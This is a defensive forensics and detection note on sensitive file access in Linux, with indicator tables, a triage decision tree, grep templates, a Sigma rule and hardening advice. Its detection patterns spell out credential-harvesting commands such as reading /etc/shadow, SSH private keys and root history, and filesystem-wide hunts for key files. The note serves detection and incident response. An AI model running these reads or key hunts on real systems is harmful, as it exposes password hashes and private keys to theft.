This note documents detection patterns related to Sensitive File Access on Linux systems.
Direct Indicators
| Source | Grep Pattern / Artifact | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Shell history | cat /etc/shadow | Password hash access | Critical | High-confidence credential access. |
| Shell history | cat /etc/passwd | Account enumeration | High | Often paired with shadow access. |
| Shell history | sudo cat /etc/shadow | Privileged credential theft | Critical | Strong escalation evidence. |
| Shell history | grep root /etc/shadow | Targeted credential inspection | Critical | Strong operator intent. |
| Shell history | cat ~/.ssh/id_rsa | Private key access | Critical | Credential theft or reuse. |
| Shell history | cat ~/.ssh/authorized_keys | Access path review | High | Persistence reconnaissance. |
| Shell history | cat /root/.bash_history | Root activity theft | Critical | Post-compromise intelligence gathering. |
| Shell history | ls /root/.ssh | Root key enumeration | Critical | Strong privilege abuse indicator. |
| Shell history | find / -name "*.pem" | Key hunting | Critical | Broad credential search. |
| Shell history | find / -name "*.key" | Key hunting | Critical | Broad credential search. |
| Shell history | cat /etc/hosts | Internal environment mapping | Medium | Often early reconnaissance. |
auditd | read access to sensitive files | File truth | Critical | Best attribution if enabled. |
| File access timestamps | atime changes | Read timing anchor | High | Useful if enabled. |
journalctl | privileged file read context | Runtime clue | Medium | Limited but sometimes useful. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Shadow access after sudo | Credential theft progression | Critical | Common post-escalation move. |
| Key file access after SSH foothold | Credential expansion | Critical | Lateral movement preparation. |
| Root history access | Operator situational awareness | High | Indicates hands-on intrusion. |
| Broad file hunting | find across key extensions | Critical | Credential collection pattern. |
| Sensitive file copied to temp | Exfil staging | Critical | Strong malicious chain. |
| Sensitive file plus scp/curl | Exfiltration path | Critical | Strong compromise signal. |
| Access under service account | Highly suspicious | Critical | Often exploitation context. |
| Access followed by hash cracking prep | Credential operation | Critical | Strong intent evidence. |
| Multiple key types searched | Broad credential harvesting | High | Operator maturity indicator. |
| Root-only file touched recently | Privileged compromise | Critical | Severity amplifier. |
Common Tools
| Tool | Usage |
|---|---|
cat | Direct file read. |
less | Interactive review. |
grep | Targeted extraction. |
find | Credential hunting. |
cp | File staging. |
tar | Bulk archive for exfiltration. |
Relevant Artifacts
| Artifact | Path / Command | Forensic Value | Notes |
|---|---|---|---|
| Password hashes | /etc/shadow | Critical | Credential theft target. |
| Accounts | /etc/passwd | High | User inventory. |
| SSH private keys | ~/.ssh/id_* | Critical | Credential material. |
| Authorized keys | ~/.ssh/authorized_keys | High | Access persistence context. |
| Root history | /root/.bash_history | Critical | High-value attacker target. |
| Root SSH | /root/.ssh/ | Critical | Privileged credential target. |
| Audit logs | /var/log/audit/audit.log | Critical | File read attribution. |
| Temp dirs | /tmp, /var/tmp, /dev/shm | High | Staged sensitive copies. |
MITRE ATT&CK References
- T1003 OS Credential Dumping
- T1552 Unsecured Credentials
- T1552.001 Credentials in Files
Decision Tree
-
Was sensitive file accessed?
- Search shell history and audit logs.
-
Which file?
- Shadow, keys, root history, configs.
-
Was privilege needed?
- Check sudo or root context.
-
Was file copied or exfiltrated?
- Temp paths, scp, curl, archives.
-
Was credential reused?
- Follow into SSH movement or persistence.
-
Pivot
- File → credential type.
- User → privilege context.
- Timestamp → intrusion timeline.
-
Confirm credential access
- Sensitive file read + suspicious sequence = strong credential collection.
Example Detection Templates
Grep
grep -R "cat /etc/shadow\|cat /etc/passwd\|id_rsa\|authorized_keys\|/root/.bash_history\|find / -name \".*pem\"" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep -R "shadow\|id_rsa\|authorized_keys\|.pem\|.key" /home/*/.bash_history /root/.bash_history 2>/dev/null
grep -R "sudo cat /etc/shadow" /home /root 2>/dev/null
Journalctl
journalctl | grep -E "shadow|authorized_keys|id_rsa"
File Inspection
find /home /root -name "*.pem" -o -name "*.key" 2>/dev/null
stat /etc/shadow
Sigma
title: Linux Sensitive File Access
id: linux-sensitive-file-access
status: experimental
description: Detects suspicious access to sensitive credential-bearing files on Linux
logsource:
product: linux
detection:
selection_keywords:
message|contains:
- '/etc/shadow'
- 'id_rsa'
- 'authorized_keys'
- '/root/.bash_history'
condition: selection_keywords
fields:
- message
- hostname
falsepositives:
- Legitimate administration
level: high
tags:
- attack.credential_access
- attack.t1552.001
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Least privilege | Restrict access to sensitive files | Critical | Core credential defense. |
| Auditd | Monitor reads of high-value files | Critical | Strong attribution. |
| Key hygiene | Protect private keys and rotate when exposed | High | Limits credential reuse. |
| Root access control | Limit sudo/root shell spread | High | Reduces privileged file exposure. |
| File integrity | Watch sensitive path reads/writes | High | Important high-value coverage. |
Fast Triage Checks
| Question | Command / Artifact | Why It Matters |
|---|---|---|
| Was shadow accessed? | grep history / audit | Credential theft check. |
| Were keys viewed? | inspect ssh paths | Lateral movement clue. |
| Was root history read? | grep shell history | Operator awareness clue. |
| Was file copied? | inspect temp dirs | Exfil staging. |
| Was file transferred? | scp / curl history | Exfil proof. |
| Was privilege escalated first? | sudo timeline | Attack chain reconstruction. |
High Value Grep Strings
| Pattern | Why It Matters |
|---|---|
/etc/shadow | Password hash target. |
/etc/passwd | User inventory. |
id_rsa | Private key access. |
authorized_keys | Persistence/access review. |
/root/.bash_history | Root activity theft. |
.pem | Key hunting. |
.key | Key hunting. |
Analyst Notes
| Scenario | Interpretation |
|---|---|
| Shadow access after sudo | Strong credential theft chain. |
| Root key read | High-severity credential compromise. |
| Sensitive file copied to temp | Exfil staging likely. |
| Key hunting across filesystem | Broad credential harvest. |
| Root history read early | Operator gathering context fast. |
| Shadow + SSH movement | Credential-to-lateral chain. |